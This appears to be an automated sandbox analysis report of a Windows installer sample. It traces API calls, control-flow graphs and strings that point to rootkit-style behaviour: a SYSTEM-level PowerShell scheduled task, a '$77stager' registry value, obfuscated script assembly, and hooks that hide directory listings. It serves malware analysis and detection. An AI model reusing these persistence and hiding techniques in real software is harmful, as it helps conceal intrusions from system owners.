                                                                                                                                    • Part of subcall function 007C1674: SysFreeString.OLEAUT32(?), ref: 007C178C
                                                                                                                                    • Part of subcall function 007C1674: SysFreeString.OLEAUT32(00000000), ref: 007C178F
                                                                                                                                    • Part of subcall function 007C112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,007C18AA,?,?,?,?,?,007C179D), ref: 007C113D
                                                                                                                                    • Part of subcall function 007C112F: IsWow64Process.KERNEL32(00000000,?,?,007C18AA,?,?,?,?,?,007C179D), ref: 007C1144
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32($77svc64), ref: 007C11C2
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32(007C2228), ref: 007C11CC
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32(powershell), ref: 007C11D8
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32(?), ref: 007C11E0
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32(007C218C), ref: 007C11EA
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32(SYSTEM), ref: 007C11F4
                                                                                                                                    • Part of subcall function 007C11AD: CoInitializeEx.COMBASE(00000000,00000000), ref: 007C11FB
                                                                                                                                    • Part of subcall function 007C11AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C1215
                                                                                                                                    • Part of subcall function 007C11AD: CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C123E
                                                                                                                                    • Part of subcall function 007C11AD: VariantInit.OLEAUT32(?), ref: 007C1250
                                                                                                                                    • Part of subcall function 007C151A: SysAllocString.OLEAUT32($77svc64), ref: 007C152C
                                                                                                                                    • Part of subcall function 007C151A: SysAllocString.OLEAUT32(007C218C), ref: 007C1538
                                                                                                                                    • Part of subcall function 007C151A: CoInitializeEx.OLE32(00000000,00000000), ref: 007C153F
                                                                                                                                    • Part of subcall function 007C151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C1559
                                                                                                                                    • Part of subcall function 007C151A: CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C1582
                                                                                                                                    • Part of subcall function 007C151A: VariantInit.OLEAUT32(?), ref: 007C1594
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
                                                                                                                                  • String ID: $77stager$$77svc32$$77svc64$@Vu$EXE$SOFTWARE
                                                                                                                                  • API String ID: 2402434814-542727658
                                                                                                                                  • Opcode ID: 0c7e7f63e618ba7e221d513c100780003a42012fd2541b9891f9f79d89dc7ad3
                                                                                                                                  • Instruction ID: 63fe2ccdcd1dfa6f181f61ae517dffd13dc86046229562dd8e364fac8934f912
                                                                                                                                  • Opcode Fuzzy Hash: 0c7e7f63e618ba7e221d513c100780003a42012fd2541b9891f9f79d89dc7ad3
                                                                                                                                  • Instruction Fuzzy Hash: 01118261704719BBAB1127725C8EF7B2B9DEB837A0B48003DB905E2153EE2CCC42C6B4
                                                                                                                                  Function 007C1000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34encryptionCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 191 7c1000-7c1026 CryptAcquireContextW 192 7c1028-7c1041 CryptGenRandom CryptReleaseContext 191->192 193 7c1044-7c104a 191->193 192->193
                                                                                                                                  APIs
                                                                                                                                  • CryptAcquireContextW.ADVAPI32(007C1A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,007C1A2F), ref: 007C101E
                                                                                                                                  • CryptGenRandom.ADVAPI32(007C1A2F,00004000,00000000,?,007C1A2F), ref: 007C102D
                                                                                                                                  • CryptReleaseContext.ADVAPI32(007C1A2F,00000000,?,007C1A2F), ref: 007C1039
                                                                                                                                  Strings
                                                                                                                                  • Microsoft Base Cryptographic Provider v1.0, xrefs: 007C100E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                  • String ID: Microsoft Base Cryptographic Provider v1.0
                                                                                                                                  • API String ID: 1815803762-291530887
                                                                                                                                  • Opcode ID: 7fd46311f205c262b9c7bbba6274ada5e695ec703c5a4c0878795247584b4dc4
                                                                                                                                  • Instruction ID: dc4f6d6391a3a9ca6ba7dd75e10d57450cb527ee9e555b7aebf75a146979cda8
                                                                                                                                  • Opcode Fuzzy Hash: 7fd46311f205c262b9c7bbba6274ada5e695ec703c5a4c0878795247584b4dc4
                                                                                                                                  • Instruction Fuzzy Hash: 35E02B727001247FEB304B959C89FCB3B6CEB40754F10403EB504E3110D9A4CD80D274
                                                                                                                                  Function 007C19E1 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 166memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00008000,754A2EB0,00000000,007C222C), ref: 007C19F4
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 007C1A01
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00004000), ref: 007C1A15
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 007C1A1C
                                                                                                                                    • Part of subcall function 007C1000: CryptAcquireContextW.ADVAPI32(007C1A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,007C1A2F), ref: 007C101E
                                                                                                                                    • Part of subcall function 007C1000: CryptGenRandom.ADVAPI32(007C1A2F,00004000,00000000,?,007C1A2F), ref: 007C102D
                                                                                                                                    • Part of subcall function 007C1000: CryptReleaseContext.ADVAPI32(007C1A2F,00000000,?,007C1A2F), ref: 007C1039
                                                                                                                                  • StrStrIW.KERNELBASE(?,007C37E4), ref: 007C1A46
                                                                                                                                  • StrStrIW.SHLWAPI(00000002,007C37E4), ref: 007C1A6D
                                                                                                                                  • StrNCatW.SHLWAPI(00000000,?,?), ref: 007C1A84
                                                                                                                                  • StrCatW.SHLWAPI(00000000,007C37E8), ref: 007C1A90
                                                                                                                                  • StrCatW.SHLWAPI(?,'+[Char](), ref: 007C1AE8
                                                                                                                                  • StrCatW.SHLWAPI(?,?), ref: 007C1AF2
                                                                                                                                  • StrCatW.SHLWAPI(?,'+'), ref: 007C1B1C
                                                                                                                                  • StrCatW.SHLWAPI(00000000,?), ref: 007C1B2C
                                                                                                                                  • StrCatW.SHLWAPI(00000000,007C37E8), ref: 007C1B47
                                                                                                                                  • StrStrIW.SHLWAPI(?,007C37E4), ref: 007C1B61
                                                                                                                                  • StrCatW.SHLWAPI(00000000,?), ref: 007C1B75
                                                                                                                                  • StrCpyW.SHLWAPI(?,00000000), ref: 007C1B7C
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C1B8A
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 007C1B93
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 007C1B99
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000), ref: 007C1B9C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                                                                                                  • String ID: '+'$'+[Char]($)+'
                                                                                                                                  • API String ID: 3510167801-3465596256
                                                                                                                                  • Opcode ID: e9055affbebe9d8fe56e88e681ffbd3336cc90007934f6c7421f9c8e3f808acd
                                                                                                                                  • Instruction ID: 20e43d23cf1a454459160a0d9f544b61f4d1e0731194a85835b51f34602aba82
                                                                                                                                  • Opcode Fuzzy Hash: e9055affbebe9d8fe56e88e681ffbd3336cc90007934f6c7421f9c8e3f808acd
                                                                                                                                  • Instruction Fuzzy Hash: B95131B1E0021CABCB14DFE8DC89EAEBBB9FB49700F14456EE505E3241DA79DA41CB54
                                                                                                                                  Function 007C11AD Relevance: 42.4, APIs: 20, Strings: 4, Instructions: 356memorycomCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 61 7c11ad-7c1203 SysAllocString * 6 CoInitializeEx 62 7c1209-7c121d CoInitializeSecurity 61->62 63 7c14f0 61->63 64 7c121f-7c1224 62->64 65 7c122a-7c1246 CoCreateInstance 62->65 66 7c14f3-7c1519 SysFreeString * 6 63->66 64->65 67 7c14e5 64->67 65->67 68 7c124c-7c1291 VariantInit 65->68 69 7c14e8-7c14ee CoUninitialize 67->69 71 7c14d4 68->71 72 7c1297-7c12ac 68->72 69->66 73 7c14d7-7c14e3 71->73 72->71 75 7c12b2-7c12c5 72->75 73->69 78 7c12cb-7c12dd 75->78 79 7c14c6 75->79 83 7c14b8 78->83 84 7c12e3-7c12f0 78->84 80 7c14c9-7c14d2 79->80 80->73 85 7c14bb-7c14c4 83->85 87 7c14aa 84->87 88 7c12f6-7c1302 84->88 85->80 90 7c14ad-7c14b6 87->90 88->87 93 7c1308-7c131a 88->93 90->85 93->87 95 7c1320-7c1336 93->95 97 7c149c 95->97 98 7c133c-7c1352 95->98 99 7c149f-7c14a8 97->99 102 7c148e 98->102 103 7c1358-7c136a 98->103 99->90 104 7c1491-7c149a 102->104 107 7c1480 103->107 108 7c1370-7c1383 103->108 104->99 109 7c1483-7c148c 107->109 111 7c1389-7c139f 108->111 112 7c1472 108->112 109->104 117 7c1464 111->117 118 7c13a5-7c13b3 111->118 114 7c1475-7c147e 112->114 114->109 119 7c1467-7c1470 117->119 121 7c13b9-7c13c7 118->121 122 7c1456 118->122 119->114 121->122 127 7c13cd-7c13db 121->127 124 7c1459-7c1462 122->124 124->119 127->122 129 7c13dd-7c1440 VariantInit * 3 127->129 130 7c1444-7c1446 129->130 130->124 131 7c1448-7c1454 130->131 131->124
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32($77svc64), ref: 007C11C2
                                                                                                                                  • SysAllocString.OLEAUT32(007C2228), ref: 007C11CC
                                                                                                                                  • SysAllocString.OLEAUT32(powershell), ref: 007C11D8
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 007C11E0
                                                                                                                                  • SysAllocString.OLEAUT32(007C218C), ref: 007C11EA
                                                                                                                                  • SysAllocString.OLEAUT32(SYSTEM), ref: 007C11F4
                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000), ref: 007C11FB
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C1215
                                                                                                                                  • CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C123E
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C1250
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C13EA
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C13F0
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C1400
                                                                                                                                  • CoUninitialize.COMBASE ref: 007C14E8
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C14FA
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 007C14FD
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C1502
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C1507
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C150C
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C1511
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                  • String ID: $77svc32$$77svc64$SYSTEM$powershell
                                                                                                                                  • API String ID: 3960698109-842754474
                                                                                                                                  • Opcode ID: dc52f714022369376d0a809ae66fbf5e102d3e96ef2adb8630216f14e061e5d8
                                                                                                                                  • Instruction ID: 8530ef97b94d0fc788d6c691f085c31d73c6172eee9d16240db4da1046d19d47
                                                                                                                                  • Opcode Fuzzy Hash: dc52f714022369376d0a809ae66fbf5e102d3e96ef2adb8630216f14e061e5d8
                                                                                                                                  • Instruction Fuzzy Hash: 13C10A71E00119EFDB04DFA4C984EAEBBB9FF49314B5040ADE905EB211DB75AE06DB50
                                                                                                                                  Function 007C1674 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128memorycomCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 173 7c1674-7c16a1 SysAllocString * 2 CoInitializeEx 174 7c16a7-7c16bb CoInitializeSecurity 173->174 175 7c1782 173->175 176 7c16bd-7c16c2 174->176 177 7c16c8-7c16e4 CoCreateInstance 174->177 178 7c1785-7c1797 SysFreeString * 2 175->178 176->177 179 7c1777 176->179 177->179 180 7c16ea-7c1729 VariantInit 177->180 181 7c177a-7c1780 CoUninitialize 179->181 182 7c172d-7c1732 180->182 181->178 183 7c1769 182->183 184 7c1734-7c174a 182->184 185 7c176c-7c1775 183->185 184->185 188 7c174c-7c1767 184->188 185->181 188->185
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32($77svc32), ref: 007C1686
                                                                                                                                  • SysAllocString.OLEAUT32(007C218C), ref: 007C1690
                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000), ref: 007C1699
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C16B3
                                                                                                                                  • CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C16DC
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C16EE
                                                                                                                                  • CoUninitialize.COMBASE ref: 007C177A
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C178C
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 007C178F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                  • String ID: $77svc32
                                                                                                                                  • API String ID: 4184240511-3937287066
                                                                                                                                  • Opcode ID: 35063656e201179760d68997222dfeba3bfa683d130c585ebef2fdc76e44e7dc
                                                                                                                                  • Instruction ID: a2bab2d83826e2856dcb05a6db82fc26a8ace6676f86afe339b9f65bfbad1858
                                                                                                                                  • Opcode Fuzzy Hash: 35063656e201179760d68997222dfeba3bfa683d130c585ebef2fdc76e44e7dc
                                                                                                                                  • Instruction Fuzzy Hash: 9F316071A00518AFDB00DFA8CC84EAFBB7DEF4A754B10406DF905EB251CA75AD46CBA0
                                                                                                                                  Function 007C1986 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36stringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 194 7c1986-7c19b1 lstrlenW call 7c104b 197 7c19dd-7c19e0 194->197 198 7c19b3-7c19bd StrStrIW 194->198 198->197 199 7c19bf 198->199 200 7c19c0-7c19da StrStrIW 199->200 200->200 201 7c19dc 200->201 201->197
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(Get-Delegate,00000000,007C222C), ref: 007C1999
                                                                                                                                  • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 007C19B5
                                                                                                                                  • StrStrIW.SHLWAPI(?,Get-Delegate,754A2EB0), ref: 007C19D2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: Get-Delegate
                                                                                                                                  • API String ID: 1659193697-1365458365
                                                                                                                                  • Opcode ID: b258952ae0bbe939cc915a30f239a95be94f122556776f60efe6d11e227a74aa
                                                                                                                                  • Instruction ID: f0b3157e61dff86873902e67ca09a739932a718931fee6a61ab68c353ce7931f
                                                                                                                                  • Opcode Fuzzy Hash: b258952ae0bbe939cc915a30f239a95be94f122556776f60efe6d11e227a74aa
                                                                                                                                  • Instruction Fuzzy Hash: CEF05B31700218ABDB149B659D44F9EB7FCAF45344F04407FE905F3151EA749D41C664
                                                                                                                                  Function 007C1798 Relevance: 3.0, APIs: 2, Instructions: 3COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 210 7c1798-7c179e call 7c17a5 ExitProcess
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007C17A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 007C17B5
                                                                                                                                    • Part of subcall function 007C17A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,007C179D), ref: 007C17C8
                                                                                                                                    • Part of subcall function 007C17A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,007C179D), ref: 007C17DA
                                                                                                                                    • Part of subcall function 007C17A5: LockResource.KERNEL32(00000000,?,?,?,?,?,007C179D), ref: 007C17E5
                                                                                                                                    • Part of subcall function 007C17A5: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,007C179D), ref: 007C1801
                                                                                                                                    • Part of subcall function 007C17A5: RegSetValueExW.KERNELBASE(?,$77stager,00000000,00000003,00000000,00000000,?,?,?,?,?,007C179D), ref: 007C1818
                                                                                                                                  • ExitProcess.KERNEL32 ref: 007C179E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3836967525-0
                                                                                                                                  • Opcode ID: fe0f7579d6cd2895b4a2b026b955202619b4311eb1ee058bf3e851ca6d0a1294
                                                                                                                                  • Instruction ID: 07fa38cf365c9b7bd95d29a32d43187cd8bd2777d78e02892150d688b4e76303
                                                                                                                                  • Opcode Fuzzy Hash: fe0f7579d6cd2895b4a2b026b955202619b4311eb1ee058bf3e851ca6d0a1294
                                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 007C118E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10libraryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 213 7c118e-7c119b GetModuleHandleA 214 7c119d-7c11a9 GetProcAddress 213->214 215 7c11aa-7c11ac 213->215
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,007C1178,?), ref: 007C1193
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 007C11A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                  • API String ID: 1646373207-1489217083
                                                                                                                                  • Opcode ID: 78b3e20d6ef7dedabfa347a9593490063c850becfcc37b955475a554c3968e53
                                                                                                                                  • Instruction ID: 9a5c7b238da495da178df867b2370e3c15de28ad742573862f0d171fd8728405
                                                                                                                                  • Opcode Fuzzy Hash: 78b3e20d6ef7dedabfa347a9593490063c850becfcc37b955475a554c3968e53
                                                                                                                                  • Instruction Fuzzy Hash: 60C092E0F80708DFAF512FB0AD0DF162B986A45B0238C846EB206D019BDEACC442D524

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:20.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:12.8%
                                                                                                                                  Total number of Nodes:1398
                                                                                                                                  Total number of Limit Nodes:24
                                                                                                                                  execution_graph 13553 1c5627d4 NtQueryDirectoryFileEx 13554 1c562984 13553->13554 13555 1c56285e _invalid_parameter_noinfo 13553->13555 13555->13554 13556 1c5628b5 GetFileType 13555->13556 13557 1c5628c3 StrCpyW 13556->13557 13558 1c5628d9 13556->13558 13559 1c5628e8 13557->13559 13569 1c561ad0 GetFinalPathNameByHandleW 13558->13569 13563 1c562989 13559->13563 13567 1c5628f2 13559->13567 13561 1c563d4c StrCmpNIW 13561->13563 13563->13554 13563->13561 13564 1c5634d8 4 API calls 13563->13564 13565 1c561dd0 2 API calls 13563->13565 13564->13563 13565->13563 13567->13554 13574 1c563d4c 13567->13574 13577 1c5634d8 StrCmpIW 13567->13577 13581 1c561dd0 13567->13581 13570 1c561afa StrCmpNIW 13569->13570 13571 1c561b39 13569->13571 13570->13571 13572 1c561b14 lstrlenW 13570->13572 13571->13559 13572->13571 13573 1c561b26 StrCpyW 13572->13573 13573->13571 13575 1c563d6e 13574->13575 13576 1c563d59 StrCmpNIW 13574->13576 13575->13567 13576->13575 13578 1c563521 PathCombineW 13577->13578 13579 1c56350a StrCpyW StrCatW 13577->13579 13580 1c56352a 13578->13580 13579->13580 13580->13567 13582 1c561de7 13581->13582 13584 1c561df0 13581->13584 13583 1c561530 2 API calls 13582->13583 13583->13584 13584->13567 13585 1c562dd0 NtDeviceIoControlFile 13586 1c563154 13585->13586 13587 1c562e4f 13585->13587 13587->13586 13588 1c562e6d GetModuleHandleA 13587->13588 13589 1c562e91 13588->13589 13590 1c562e7f GetProcAddress 13588->13590 13589->13586 13591 1c562eb8 StrCmpNIW 13589->13591 13590->13589 13591->13586 13592 1c562edd 13591->13592 13592->13586 13593 1c561a30 6 API calls 13592->13593 13594 1c563099 lstrlenW 13592->13594 13595 1c562fef lstrlenW 13592->13595 13596 1c561cf8 StrCmpIW StrCmpW 13592->13596 13597 1c563d4c StrCmpNIW 13592->13597 13593->13592 13594->13592 13595->13592 13596->13592 13597->13592 14805 1c56c2d0 14806 1c56c2d8 14805->14806 14808 1c56c305 14806->14808 14809 1c56c334 14806->14809 14810 1c56c35f 14809->14810 14811 1c56c342 DeleteCriticalSection 14810->14811 14812 1c56c363 14810->14812 14811->14810 14812->14808 15189 1c5743d1 __scrt_dllmain_exception_filter 14524 1c57455d 14527 1c56acf4 14524->14527 14528 1c56ad0e 14527->14528 14530 1c56ad5b 14527->14530 14529 1c5690e4 __CxxCallCatchBlock 9 API calls 14528->14529 14528->14530 14529->14530 15190 1c56bfd8 15191 1c56d060 __free_lconv_num 13 API calls 15190->15191 15192 1c56bfe8 15191->15192 15193 1c56d060 __free_lconv_num 13 API calls 15192->15193 15194 1c56bffc 15193->15194 15195 1c56d060 __free_lconv_num 13 API calls 15194->15195 15196 1c56c010 15195->15196 15197 1c56d060 __free_lconv_num 13 API calls 15196->15197 15198 1c56c024 15197->15198 14531 1c562d44 14533 1c562da1 14531->14533 14532 1c562dbc 14533->14532 14534 1c563678 3 API calls 14533->14534 14534->14532 14813 1c56b2c0 14818 1c56c318 EnterCriticalSection 14813->14818 15054 1c56bf40 15057 1c56bcf8 15054->15057 15064 1c56bcc0 15057->15064 15062 1c56bc7c 13 API calls 15063 1c56bd2b 15062->15063 15065 1c56bcd5 15064->15065 15066 1c56bcd0 15064->15066 15068 1c56bcdc 15065->15068 15067 1c56bc7c 13 API calls 15066->15067 15067->15065 15069 1c56bcf1 15068->15069 15070 1c56bcec 15068->15070 15069->15062 15071 1c56bc7c 13 API calls 15070->15071 15071->15069 14446 1c568ccc 14453 1c56922c 14446->14453 14449 1c568cd9 14454 1c569234 14453->14454 14456 1c569265 14454->14456 14457 1c568cd5 14454->14457 14470 1c569ae8 14454->14470 14458 1c569274 __vcrt_uninitialize_locks DeleteCriticalSection 14456->14458 14457->14449 14459 1c5691c0 14457->14459 14458->14457 14475 1c5699bc 14459->14475 14471 1c56986c __vcrt_FlsAlloc 5 API calls 14470->14471 14472 1c569b1e 14471->14472 14473 1c569b33 InitializeCriticalSectionAndSpinCount 14472->14473 14474 1c569b28 14472->14474 14473->14474 14474->14454 14476 1c56986c __vcrt_FlsAlloc 5 API calls 14475->14476 14477 1c5699e1 TlsAlloc 14476->14477 15199 1c567fcc 15206 1c568cf4 15199->15206 15202 1c567fd9 15207 1c569100 __CxxCallCatchBlock 9 API calls 15206->15207 15208 1c567fd5 15207->15208 15208->15202 15209 1c56c048 15208->15209 15210 1c56c8d0 __free_lconv_num 13 API calls 15209->15210 15211 1c567fe2 15210->15211 15211->15202 15212 1c568d08 15211->15212 15215 1c56909c 15212->15215 15214 1c568d11 15214->15202 15216 1c5690ad 15215->15216 15220 1c5690c2 15215->15220 15217 1c569a4c __CxxCallCatchBlock 6 API calls 15216->15217 15218 1c5690b2 15217->15218 15221 1c569a94 15218->15221 15220->15214 15222 1c56986c __vcrt_FlsAlloc 5 API calls 15221->15222 15223 1c569ac2 15222->15223 15224 1c569ad4 TlsSetValue 15223->15224 15225 1c569acc 15223->15225 